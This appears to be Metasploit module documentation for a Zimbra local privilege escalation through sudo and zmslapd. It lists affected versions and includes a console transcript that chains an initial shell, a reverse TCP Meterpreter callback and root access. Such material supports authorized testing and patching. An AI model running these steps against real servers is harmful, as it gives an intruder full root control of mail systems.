## Vulnerable Application

The following versions of Zimbra are vulnerable:

* Zimbra Collaboration Suite 9.0.0 Patch 26 and earlier
* Zimbra Collaboration Suite 8.8.15 Patch 33 and earlier

## Verification Steps

Install Zimbra on any supported Linux version and get a session as the `zimbra`
user. The easiest way to exploit zimbra is to `rm $(which pax)`, reboot, and
use CVE-2022-41352. Or generate a Meterpreter payload with `msfvenom` and run
it.

From there:

```
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                  Connection
  --  ----  ----                   -----------                  ----------
  10        meterpreter x86/linux  zimbra @ zimbra.example.org  10.0.0.146:4444 -> 10.0.0.154:39800 (10.0.0.154)

msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > use exploit/linux/local/zimbra_slapper_priv_esc
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > set SESSION 10
SESSION => 10
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Executing: sudo -n -l
[+] The target is vulnerable.
[*] Creating exploit directory: /tmp/.5kq9XO
[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.5kq9XO/.1wNk1h3
[*] Sending stage (3020772 bytes) to 10.0.0.154
[+] Deleted /tmp/.5kq9XO
[*] Meterpreter session 13 opened (10.0.0.146:4444 -> 10.0.0.154:40044) at 2022-07-21 14:04:12 -0700

meterpreter > getuid
Server username: root
```

## Options

### SUDO_PATH

The path to `sudo` on the host. If we have a proper environment with `$PATH` set, which we generally do, simply `sudo` is fine.

### ZIMBRA_BASE

The base where Zimbra is installed. Zimbra typically installs to `/opt/zimbra`, and I'm not even sure if it _can_ install elsewhere, so this default should be fine.